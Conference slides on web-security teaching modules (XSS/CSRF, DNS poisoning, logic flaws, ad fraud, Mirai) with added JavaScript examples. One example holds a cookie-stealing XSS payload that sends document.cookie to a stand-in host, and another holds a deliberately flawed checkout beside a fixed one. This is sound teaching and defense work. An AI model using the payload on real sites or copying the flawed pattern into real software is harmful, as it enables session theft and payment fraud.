Developing Web Security Teaching Modules with Visualization and Hands-on Labs
Li Yang, Carson Woods (University of Tennessee at Chattanooga), Xiaohong Yuan (North Carolina A&T SU)
Cyber Ed Curriculum Showcase, April 23, 2018
Motivation
The challenge of conveying complex and dynamic information security concepts to students
Engaging students in active learning in information security education
Outline
Project Overview
Project Objectives
Developed Modules
Lessons Learned
Future Work
Project Overview
With the increasing number of consumers and applications relying on web applications, they have become a profitable target for cybercrime. A successful attack on a web application can bypass traditional enterprise perimeters guarded by firewalls and intrusion detection systems, resulting in data loss or a breach of privacy. Understanding web threats, vulnerabilities, and defenses is important for both users and developers.
Developing visualization tools to understand web threats and security
Developing hands-on labs to sharpen student skills in web security
Project Overview – Visualization
Surveys suggest a widespread belief that visualization technology positively impacts learning [Naps03]. There is growing evidence that concept visualization systems are indeed effective when they engage learners in an active learning activity [Grissom03, Naps03]. Students benefit from interactive visualization as one of the active learning approaches, which involve students in classroom activities that are meaningful and make them think about what they are doing [Bonwell91].
Teaching Modules in Web Security
Web Security Visualization + Lab
Cross-Site Scripting (XSS) & Cross-Site Request Forgery (CSRF)
DNS Cache Poisoning and Pharming: Attack and Defense
Logic Flaw
Ad Fraud
IoT Botnet
Browser Extensions
Why these topics: top vulnerabilities, in the news, emerging; complex, abstract, dynamic; time constraints
Module 1: Cross-Site Scripting (XSS) & Cross-Site Request Forgery (CSRF)
Cross-site scripting (XSS) is a type of vulnerability commonly found in web applications. It makes it possible for attackers to inject malicious code (e.g. JavaScript) into the victim's web browser. Using this code, attackers can steal the victim's credentials, such as session cookies, and bypass access control policies.
Visualization:
Normal web operation
Vulnerabilities and attacks
Defense strategies
Cross-Site Scripting (XSS) Visualization Samples
Figure 1: (a) Mel steals cookies from Alice; (b) Mel impersonates Alice with Alice's cookie
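The two panels of Figure 1 in code, as an added example that is not part of the slides or the project's visualization tool: a page that echoes a search term unescaped (the sink Mel abuses to read Alice's cookie), the output-escaping and HttpOnly defenses that break each half of the attack, and the synchronizer-token check that covers the CSRF side of Module 1. The host mel.example, the cookie and token values, and the click log of events are constructed for the example.

```javascript
// Added example (not part of the slides): the cookie-theft XSS from Figure 1 beside two
// defenses, plus the synchronizer-token check that defeats the CSRF half of Module 1.
// mel.example and all cookie/token values are constructed for this example.

// Vulnerable sink: a search page echoes the query straight into its HTML.
function renderSearchResultVulnerable(term) {
  return `<p>Results for: ${term}</p>`;
}

// Defense 1: escape the characters that let text break out of an HTML text node
// or a quoted attribute before the browser's parser sees it.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderSearchResultSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// Constructed payload of the kind Mel plants in a link he sends Alice. If the page echoes
// it unescaped, Alice's browser loads an "image" from Mel's host with her cookies in the URL.
const cookieTheftPayload =
  "<script>new Image().src='https://mel.example/c?d='+encodeURIComponent(document.cookie)</script>";

// Stand-in for "would a script element reach the parser?" (case-insensitive tag match).
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Defense 2: even if script does run, an HttpOnly cookie is invisible to document.cookie,
// so Mel cannot replay Alice's session as in Figure 1(b).
function sessionCookieHeader(sessionId) {
  return `Set-Cookie: session=${sessionId}; Path=/; Secure; HttpOnly; SameSite=Lax`;
}

// CSRF: a request forged from Mel's page carries Alice's cookie automatically, but Mel
// cannot read the per-session token the server embedded in its own form.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

function acceptStateChangingRequest(session, request) {
  // session.csrfToken is assumed to have come from a CSPRNG when the session was created.
  return typeof request.csrfToken === "string" &&
    constantTimeEqual(session.csrfToken, request.csrfToken);
}

function demo() {
  const session = { id: "s-alice", csrfToken: "3f9a1c77e0b2" }; // constructed values
  return {
    scriptReachesParserVulnerable: containsScriptTag(renderSearchResultVulnerable(cookieTheftPayload)),
    scriptReachesParserSafe: containsScriptTag(renderSearchResultSafe(cookieTheftPayload)),
    forgedTransferAccepted: acceptStateChangingRequest(session, { cookie: "session=s-alice" }),
    legitimateTransferAccepted: acceptStateChangingRequest(session, {
      cookie: "session=s-alice",
      csrfToken: session.csrfToken,
    }),
  };
}
```

Two caveats a lab should make explicit: escapeHtml is correct only for HTML text and quoted-attribute contexts (a value placed inside a script block or a URL needs its own encoder), and HttpOnly hides the cookie from script but does not stop injected script from issuing requests from inside Alice's already-authenticated browser, which is why output encoding remains the primary fix.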
Module 2: DNS Cache Poisoning and Pharming
Three players: a user, a DNS server, and an attacker
Normal operation of DNS
Several attack scenarios: cache poisoning and pharming
A defense solution such as HTTPS
Module 3: Logic Flaw
Lecture Topics:
API parameters in e-commerce
Arguments in URLs
Workflow of transactions
How to complete an expensive order using the payment intended for a cheap order
Hands-on Labs: Implement a logic flaw
Logic Flaw Visualization
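The Module 3 flaw as a small in-memory checkout, added here as an example that is not the project's lab code: the confirm step trusts the order id and payment token it receives as URL arguments and only checks that both exist, so a buyer who paid for the cheap order can finalize the expensive one. The hardened version re-checks every assumption of the workflow against the payment gateway's own record. Order ids, tokens, prices and user names are constructed.

```javascript
// Added example (not part of the slides): Module 3's "pay for the cheap order, receive the
// expensive one" as an in-memory checkout. All ids, tokens and prices are constructed.
function makeShop() {
  return {
    orders: new Map([
      ["ord-cheap", { id: "ord-cheap", buyer: "alice", totalCents: 100, status: "new" }],
      ["ord-expensive", { id: "ord-expensive", buyer: "alice", totalCents: 99900, status: "new" }],
    ]),
    // What the payment gateway recorded when Alice actually paid: one dollar, for ord-cheap.
    payments: new Map([
      ["pay-abc", { token: "pay-abc", orderId: "ord-cheap", amountCents: 100, payer: "alice", consumed: false }],
    ]),
  };
}

// Vulnerable confirm step. The workflow assumes the browser returns from the gateway with the
// same order it started with, so the API only checks that both URL arguments resolve:
//   GET /confirm?order=ord-expensive&payment=pay-abc   <- attacker edits the order argument
function confirmOrderVulnerable(shop, orderId, paymentToken) {
  const order = shop.orders.get(orderId);
  const payment = shop.payments.get(paymentToken);
  if (!order || !payment) return { ok: false, reason: "not found" };
  order.status = "paid"; // never compares payment.orderId or payment.amountCents to the order
  return { ok: true, orderId: order.id, chargedCents: payment.amountCents, owedCents: order.totalCents };
}

// Hardened confirm step: every assumption the workflow makes is re-checked on the server,
// against the gateway's record rather than anything the browser sent.
function confirmOrderSafe(shop, orderId, paymentToken, authenticatedUser) {
  const order = shop.orders.get(orderId);
  const payment = shop.payments.get(paymentToken);
  if (!order || !payment) return { ok: false, reason: "not found" };
  if (order.buyer !== authenticatedUser) return { ok: false, reason: "order belongs to another user" };
  if (order.status !== "new") return { ok: false, reason: "order already finalized" };
  if (payment.consumed) return { ok: false, reason: "payment already used" };
  if (payment.orderId !== order.id) return { ok: false, reason: "payment is for a different order" };
  if (payment.payer !== authenticatedUser) return { ok: false, reason: "payment made by another user" };
  if (payment.amountCents !== order.totalCents) return { ok: false, reason: "amount mismatch" };
  payment.consumed = true; // a token finalizes at most one order
  order.status = "paid";
  return { ok: true, orderId: order.id, chargedCents: payment.amountCents, owedCents: order.totalCents };
}
```

The checks that close the flaw are the ones tying the payment to a specific order and amount; the consumed flag and the status check also stop the same token from being replayed against a second order, a variant students commonly find once the first one works.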
Module 4: Ad Fraud
Lecture Topics:
How online advertisement works
Ad Replacement Attack
Click Hijacking Attack
Ad Fraud Mitigation Techniques: serve bluff ads, threshold-based detection, monitoring and scrutinizing unexpected DNS resolvers
Visualization: Ad Replacement, Click Hijacking
Hands-on Labs: Students will simulate ad replacement fraud
Ad Replacement Visualization
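Two of the Module 4 mitigations run over a click log, as an added example that is not part of the slides or the lab: bluff ads are ads the publisher serves that are deliberately irrelevant to the page (or never rendered at all), so a source that keeps clicking them is unlikely to be a person; the threshold rule flags a source that clicks faster than a human plausibly can. The log entries, IP addresses and ad ids are constructed.

```javascript
// Added example (not part of the slides): threshold-based and bluff-ad click-fraud
// detection over a constructed click log. ts is in seconds; bluff marks a bluff ad.
const constructedClickLog = [
  // 203.0.113.7: eight clicks in 28 seconds, three of them on bluff ads -> bot-like
  { ts: 1000, ip: "203.0.113.7", adId: "ad-shoes", bluff: false },
  { ts: 1004, ip: "203.0.113.7", adId: "ad-bluff-1", bluff: true },
  { ts: 1008, ip: "203.0.113.7", adId: "ad-cars", bluff: false },
  { ts: 1012, ip: "203.0.113.7", adId: "ad-bluff-2", bluff: true },
  { ts: 1016, ip: "203.0.113.7", adId: "ad-phones", bluff: false },
  { ts: 1020, ip: "203.0.113.7", adId: "ad-shoes", bluff: false },
  { ts: 1024, ip: "203.0.113.7", adId: "ad-bluff-1", bluff: true },
  { ts: 1028, ip: "203.0.113.7", adId: "ad-cars", bluff: false },
  // 198.51.100.4: three clicks over ten minutes, no bluff ads -> plausible human
  { ts: 2000, ip: "198.51.100.4", adId: "ad-shoes", bluff: false },
  { ts: 2300, ip: "198.51.100.4", adId: "ad-cars", bluff: false },
  { ts: 2600, ip: "198.51.100.4", adId: "ad-shoes", bluff: false },
  // 192.0.2.9: slow, but a third of its clicks land on bluff ads
  { ts: 5000, ip: "192.0.2.9", adId: "ad-bluff-1", bluff: true },
  { ts: 6200, ip: "192.0.2.9", adId: "ad-cars", bluff: false },
  { ts: 7400, ip: "192.0.2.9", adId: "ad-shoes", bluff: false },
  { ts: 8600, ip: "192.0.2.9", adId: "ad-bluff-2", bluff: true },
  { ts: 9800, ip: "192.0.2.9", adId: "ad-phones", bluff: false },
  { ts: 11000, ip: "192.0.2.9", adId: "ad-cars", bluff: false },
];

// Returns Map<ip, string[]> of flagged sources and the reason(s) each was flagged.
function detectClickFraud(clicks, opts = {}) {
  const { windowSeconds = 60, maxClicksPerWindow = 5, bluffRatio = 0.2, minBluffClicks = 2 } = opts;

  // Group by source. A production system would key on publisher + client identifier
  // rather than bare IP, since NAT puts many humans behind one address.
  const bySource = new Map();
  for (const c of clicks) {
    if (!bySource.has(c.ip)) bySource.set(c.ip, []);
    bySource.get(c.ip).push(c);
  }

  const flagged = new Map();
  for (const [ip, list] of bySource) {
    list.sort((a, b) => a.ts - b.ts);
    const reasons = [];

    // Threshold rule: largest number of clicks inside any windowSeconds-wide sliding window.
    let start = 0;
    let peak = 0;
    for (let end = 0; end < list.length; end++) {
      while (list[end].ts - list[start].ts > windowSeconds) start++;
      peak = Math.max(peak, end - start + 1);
    }
    if (peak > maxClicksPerWindow) reasons.push(`threshold: ${peak} clicks within ${windowSeconds}s`);

    // Bluff-ad rule: a meaningful share of this source's clicks landed on ads no human should want.
    const bluffs = list.filter((c) => c.bluff).length;
    if (bluffs >= minBluffClicks && bluffs / list.length > bluffRatio) {
      reasons.push(`bluff: ${bluffs} of ${list.length} clicks on bluff ads`);
    }

    if (reasons.length) flagged.set(ip, reasons);
  }
  return flagged;
}
```

The two rules catch different things: the threshold catches volume, which a patient bot can stay under, while bluff ads catch intent, which a bot that clicks whatever is served cannot hide. The minBluffClicks floor keeps a single accidental click from flagging a real user.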
Module 5: IoT Botnet (Mirai Botnet)
Topics: IoT, DoS, passwords
Visualization
Hands-on Lab: Students emulate the Mirai Command & Control (C&C) server, infect devices, and perform a DoS on a local LAMP server hosting a website.
Module 6: Browser Extensions
Topics: What is a browser extension? Security implications of browser extensions
Visualization (to come)
Hands-on Lab: Write a browser extension
User Study of Visualization Tools on XSS and CSRF
Ten students from the Secure Software Engineering class at North Carolina A&T State University participated in the survey.
On average, students spent about 20 minutes on each tool.
Evaluation of Hands-on Labs
Secure Software Engineering class at North Carolina A&T State University, spring 2016
Fifteen (15) students were enrolled in the class; thirteen (13) participated in the survey.
Students had 10 days to work on the hands-on lab on the ad replacement attack.
After completing the lab, most students rated their knowledge of the learning outcomes as excellent or high.
Demo
XSS: http://web2.utc.edu/~djy471/XSS/xss.html
Logic Flaw: http://web2.utc.edu/~djy471/logic-flaw/index.html
Lessons Learned
Good developers are important (manpower)
Recruit as early as possible (manpower)
Develop compelling stories (expertise)
Need a designer or experts in graphics (expertise/budget)
Plan for course integration (expertise)
User study and testing are important (budget/time)
Future Work
Network Security
Secure Coding
Software Vulnerabilities: buffer overflow, race condition
Wireless Security
Cryptography
Emerging Incidents